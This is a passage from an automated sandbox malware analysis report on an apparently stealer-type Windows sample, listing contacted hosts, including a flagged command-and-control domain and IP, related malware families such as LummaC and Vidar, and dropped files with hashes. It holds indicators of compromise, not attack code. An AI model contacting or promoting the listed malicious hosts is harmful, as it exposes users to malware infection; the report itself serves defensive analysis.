https://ntp.msn.com/ntp.msn.com_default	QuotaManager.10.dr	false		high
https://word.new?from=EdgeM365Shoreline	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://kotov.lol/Z	file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://outlook.office.com/mail/0/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.63	s-part-0035.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.96.180.189	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.118.171.167	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
18.165.220.66	sb.scorecardresearch.com	United States	3	MIT-GATEWAYSUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
108.139.47.92	unknown	United States	16509	AMAZON-02US	false
23.219.161.135	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.181.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
2.16.158.35	unknown	European Union	20940	AKAMAI-ASN1EU	false
23.57.90.143	unknown	United States	35994	AKAMAI-ASUS	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.117.182.56	unknown	United States	20940	AKAMAI-ASN1EU	false
23.209.72.43	unknown	United States	20940	AKAMAI-ASN1EU	false
95.217.25.228	kotov.lol	Germany	24940	HETZNER-ASDE	true
13.69.116.108	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.8
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565212
Start date and time:	2024-11-29 12:26:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@62/313@24/24
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 108 Number of non-executed functions: 252
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.208.227, 74.125.205.84, 172.217.19.238, 34.104.35.123, 13.107.42.16, 204.79.197.203, 13.107.6.158, 204.79.197.239, 13.107.21.239, 172.165.69.228, 2.16.34.27, 104.86.110.72, 2.16.34.25, 104.86.110.18, 2.16.158.96, 2.16.158.80, 2.16.158.59, 2.16.158.91, 2.16.158.72, 2.16.158.169, 2.16.158.82, 2.16.158.81, 2.16.158.58, 2.21.67.57, 2.16.76.19, 2.16.76.24, 13.74.129.1, 13.107.21.237, 204.79.197.237, 104.86.110.43, 2.16.34.34, 142.250.80.3, 142.250.64.99, 142.250.72.99, 142.251.40.227
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, wildcardtlu-ssl.azureedge.net, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, th.bing
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.246.63	https://theoggroup-my.sharepoint.com/:u:/g/personal/rohit_theoggroup_co/EW1S6u7eBPZAkl8sn76CFW4B9_fhjfgaN299JnYAgaQ9MQ?e=CXhREy&xsdata=MDV8MDJ8RGVib3JhaC5DbGFya0BtcGZ0Lm5ocy51a3w5NDRiZjU4NDRlNTk0NmZlNWNlNTA4ZGQwZmI5NDMxMnxjMzdkNjM1N2M4OGI0MjZiYjY4MGRmODE2NmE4NmVkN3wwfDB8NjM4Njg0MDEwNTcwNTEwNzIwfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=MHA0b3IvdkFFTytKRVJ3WGJUSzFiaW1jbm16a2hNNURVamQwbGRiNFB6RT0%3d	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	SwiftCopy.xla.xlsx	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM
23.96.180.189	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://go-pdf.online/abap-development-for-financial-accounting-custom-enhancements.pdf	Get hash	malicious	Unknown	Browse	46.105.201.240
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	21Installer.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	https://sendbot.me/seuemprestimogarantido	Get hash	malicious	Unknown	Browse	104.26.12.222
	https://sendbot.me/seuemprestimogarantido	Get hash	malicious	Unknown	Browse	104.26.12.222
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
chrome.cloudflare-dns.com	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	remi.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	172.64.41.3
	rem.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	162.159.61.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	94.245.104.56
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	remi.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	94.245.104.56
	rem.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
sb.scorecardresearch.com	Scan_19112024_people_power_press.pdf	Get hash	malicious	Unknown	Browse	18.165.220.66
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.27
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.110
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.66
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.106
	remi.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	18.165.220.66
	rem.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	18.165.220.57
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.165.220.110
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.110
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.57

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	botx.x86.elf	Get hash	malicious	Mirai	Browse	52.104.241.221
	qbVjvy9gv2.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	9arEd0o4IZ.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	IwSa5fjMWm.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	051qAVqlq9.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	TXj1ICMUqd.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	rkGw58sHF5.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	Vr39ff92jh.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	cY6HT7CeBF.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	ww7Oxm9pwx.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
MICROSOFT-CORP-MSN-AS-BLOCKUS	botx.x86.elf	Get hash	malicious	Mirai	Browse	52.104.241.221
	qbVjvy9gv2.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	9arEd0o4IZ.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	IwSa5fjMWm.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	051qAVqlq9.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	TXj1ICMUqd.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	rkGw58sHF5.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	Vr39ff92jh.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	cY6HT7CeBF.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	ww7Oxm9pwx.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
MICROSOFT-CORP-MSN-AS-BLOCKUS	botx.x86.elf	Get hash	malicious	Mirai	Browse	52.104.241.221
	qbVjvy9gv2.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	9arEd0o4IZ.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	IwSa5fjMWm.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	051qAVqlq9.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	TXj1ICMUqd.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	rkGw58sHF5.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	Vr39ff92jh.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	cY6HT7CeBF.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	ww7Oxm9pwx.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
MICROSOFT-CORP-MSN-AS-BLOCKUS	botx.x86.elf	Get hash	malicious	Mirai	Browse	52.104.241.221
	qbVjvy9gv2.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	9arEd0o4IZ.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	IwSa5fjMWm.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	051qAVqlq9.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	TXj1ICMUqd.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	rkGw58sHF5.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	Vr39ff92jh.exe	Get hash	malicious	Unknown	Browse	20.233.83.146
	cY6HT7CeBF.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	20.233.83.145
	ww7Oxm9pwx.exe	Get hash	malicious	Unknown	Browse	20.233.83.145

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.206.229.226
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.206.229.226
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.206.229.226
	file.exe	Get hash	malicious	Amadey, Nymaim, Stealc, Vidar	Browse	23.206.229.226
	file.exe	Get hash	malicious	Cryptbot	Browse	23.206.229.226
	goHB2EXlPf.exe	Get hash	malicious	RedLine, SectopRAT	Browse	23.206.229.226
	remi.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	23.206.229.226
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.206.229.226
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.206.229.226
	file.exe	Get hash	malicious	Cryptbot	Browse	23.206.229.226
28a2c9bd18a11de089ef85a160da29e4	https://aysesuretobea.com/	Get hash	malicious	Unknown	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	https://docs.zoom.us/doc/nOwDrP_BRFeNjNel8fAbXg	Get hash	malicious	Unknown	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	http://comgeotetra.sytes.net	Get hash	malicious	HTMLPhisher	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.html	Get hash	malicious	Unknown	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	qAyJeM1rqk.exe	Get hash	malicious	LummaC	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	https://theoggroup-my.sharepoint.com/:u:/g/personal/rohit_theoggroup_co/EW1S6u7eBPZAkl8sn76CFW4B9_fhjfgaN299JnYAgaQ9MQ?e=CXhREy&xsdata=MDV8MDJ8RGVib3JhaC5DbGFya0BtcGZ0Lm5ocy51a3w5NDRiZjU4NDRlNTk0NmZlNWNlNTA4ZGQwZmI5NDMxMnxjMzdkNjM1N2M4OGI0MjZiYjY4MGRmODE2NmE4NmVkN3wwfDB8NjM4Njg0MDEwNTcwNTEwNzIwfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=MHA0b3IvdkFFTytKRVJ3WGJUSzFiaW1jbm16a2hNNURVamQwbGRiNFB6RT0%3d	Get hash	malicious	Unknown	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	https://merge-d78e7.web.app/mail-merge-for-gmail.gif	Get hash	malicious	Unknown	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	file.exe	Get hash	malicious	LummaC Stealer	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	SwiftCopy.xla.xlsx	Get hash	malicious	Unknown	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
	Scan_6090402.pdf	Get hash	malicious	Unknown	Browse	4.175.87.197 20.109.210.53 2.18.84.141 20.190.181.0
37f463bf4616ecd445d4a1937da06e19	0b3SUiWz3y.exe	Get hash	malicious	Unknown	Browse	95.217.25.228 149.154.167.99
	ww7Oxm9pwx.exe	Get hash	malicious	Unknown	Browse	95.217.25.228 149.154.167.99
	wqK2m8VmyD.exe	Get hash	malicious	CryptOne, Mofksys	Browse	95.217.25.228 149.154.167.99
	dMFmJxq6oK.exe	Get hash	malicious	Unknown	Browse	95.217.25.228 149.154.167.99
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	95.217.25.228 149.154.167.99
	CCuITQzvd4.exe	Get hash	malicious	Unknown	Browse	95.217.25.228 149.154.167.99
	dMFmJxq6oK.exe	Get hash	malicious	Unknown	Browse	95.217.25.228 149.154.167.99
	11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	95.217.25.228 149.154.167.99
	INV_642421346_50136253995_SIMPLE_SK#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	95.217.25.228 149.154.167.99
	30180908_signed#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	95.217.25.228 149.154.167.99

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\AAEHJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08432026317203951
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vD:51zkVmvQhyn+Zoz67+
MD5:	C444D5B9503F9CCFA9750AB3D51848E9
SHA1:	FFF755261E04C7502AF2F172DE3752D9458100FE
SHA-256:	66EA7282C9A15E75F5F52CB5D745FD1B4830045EB70D99AB4F07744A67E0879E
SHA-512:	E22CC4F41EC10146718E2767B68DCB20CF02AEC55DA8686988A16350045D6A31B9CDF16B7329EE436E9DBF1795699809819FEC2E7D9D460B046FAEC65BC48334
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\AAKKFHCFI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\AFCBFI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\BAKEBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
